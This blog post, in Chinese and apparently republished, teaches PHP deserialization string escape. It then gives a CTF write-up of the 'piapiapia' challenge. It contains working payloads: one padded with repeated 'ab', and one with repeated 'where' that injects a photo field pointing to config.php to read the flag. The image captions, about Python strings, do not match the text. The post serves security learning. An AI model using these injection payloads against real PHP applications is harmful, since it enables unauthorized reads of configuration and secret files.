大家好,欢迎来到IT知识分享网。
一、php反序列化字符串逃逸
<?php
class user{
public $user = 'admin';
public $pass = 'passwd';
}
$a = new user();
$b = serialize($a);
echo $b."<br>";
$c = unserialize($b);
echo $c->pass;
?>
运行结果:
![python字符串取消转义_python去除字符串的重复字符[通俗易懂]](https://img-blog.csdnimg.cn/20200710091541993.png "python字符串取消转义_python去除字符串的重复字符[通俗易懂]插图")
![python字符串取消转义_python去除字符串的重复字符[通俗易懂]](https://yundeesoft.com/wp-content/uploads/2022/11/2022112316405970.jpg "python字符串取消转义_python去除字符串的重复字符[通俗易懂]插图1")
序列化后的字符串应该能看出来,大括号外面有类名及长度,括号里面以分号划分多个变量,包含其变量名及长度,变量值及长度。
这些都是对应好的,而如果我们对比如user的值进行修改,改为admin1,而长度不变,当反序列化时就会报错。
<?php
$a = 'O:4:"user":2:{s:4:"user";s:5:"admin1";s:4:"pass";s:6:"passwd";}';
$b = unserialize($a);
echo $b->pass;
?>
![python字符串取消转义_python去除字符串的重复字符[通俗易懂]](https://img-blog.csdnimg.cn/20200710091927476.png "python字符串取消转义_python去除字符串的重复字符[通俗易懂]插图2")
我理解的是unserilize()函数是从左往右读入,当读入s:5:时,系统就知道后面引号内是字符串且长度为5,于是从双引号开始读入长度为5的字符,但由于admin1是6个字符,导致后面第6个字符该是双引号来结束,却没有,由此产生异常。而如果我们设置的payload则可以越过这个异常。
<?php
function filter($str){
$str = str_replace("ab","ccc",$str);
return $str;
}
class user{
public $user = 'ababababababababababababababababababababababababab";s:4:"pass";s:4:"hack";}';
public $pass = 'passwd';
}
$a = new user();
echo serialize($a)."<br>";
$b = filter(serialize($a));
echo $b."<br>";
$c = unserialize($b);
echo $c->pass;
?>
其中,user的值有25个ab,经序列化后又对其进行替换,每替换一个ab,就多一个字符,这样就可能会导致前面所说的系统知道的长度和实际长度不对应,就会报错,但后面的payload=”;s:4:”pass”;s:4:”hack”;},这样就拼接起来,具体来说
初始序列化后为
O:4:"user":2:{s:4:"user";s:75:"ababababababababababababababababababababababababab";s:4:"pass";s:4:"hack";}";s:4:"pass";s:6:"passwd";}
可见长度为75,payload长度是为25,所以这里使用了25个ab,当替换后就多出25个字符。待替换后就为:
O:4:"user":2:{s:4:"user";s:75:"ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc";s:4:"pass";s:4:"hack";}";s:4:"pass";s:6:"passwd";}你可以知道,c的个数刚好为75个,而系统读入了75个字符想碰到双引号也成功,之后就会继续反序列化我们的payload,而在大括号之后的字符都会被挤进下一个参数中。
二、piapiapia
这题打开后测试过不是sql注入后,就用御剑去扫,发现扫不来什么,于是我去下了个大字典,去扫,扫到一半御剑就崩了,,,于是我去实验dirsearch以及dirmap,能扫出www.zip文件,打开后经审计,知道profile.php文件中有一个unserialize函数,而在反序列化之前,有对内部参数进行替换,也正因此我们才有字符串逃逸。同时他反序列化后对photo使用了文件读取函数,在config.php中有flag,那么我们就读取这个文件。
![python字符串取消转义_python去除字符串的重复字符[通俗易懂]](https://img-blog.csdnimg.cn/202007100942305.png "python字符串取消转义_python去除字符串的重复字符[通俗易懂]插图4")
hacker是6个字符而where是5个字符,另外nickname长度要小于10,需要用数组来绕过。于是可以构造payload:
wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}![python字符串取消转义_python去除字符串的重复字符[通俗易懂]](https://img-blog.csdnimg.cn/20200710103246832.png "python字符串取消转义_python去除字符串的重复字符[通俗易懂]插图6")
这里要注意的是,nickname是一个数组,所以在”;}s:5:这里面要加个大括号,
![python字符串取消转义_python去除字符串的重复字符[通俗易懂]](https://img-blog.csdnimg.cn/20200710103342767.png "python字符串取消转义_python去除字符串的重复字符[通俗易懂]插图8")
最后,对图片base64解密即可
![python字符串取消转义_python去除字符串的重复字符[通俗易懂]](https://img-blog.csdnimg.cn/20200710103407250.png "python字符串取消转义_python去除字符串的重复字符[通俗易懂]插图10")
免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://yundeesoft.com/29624.html
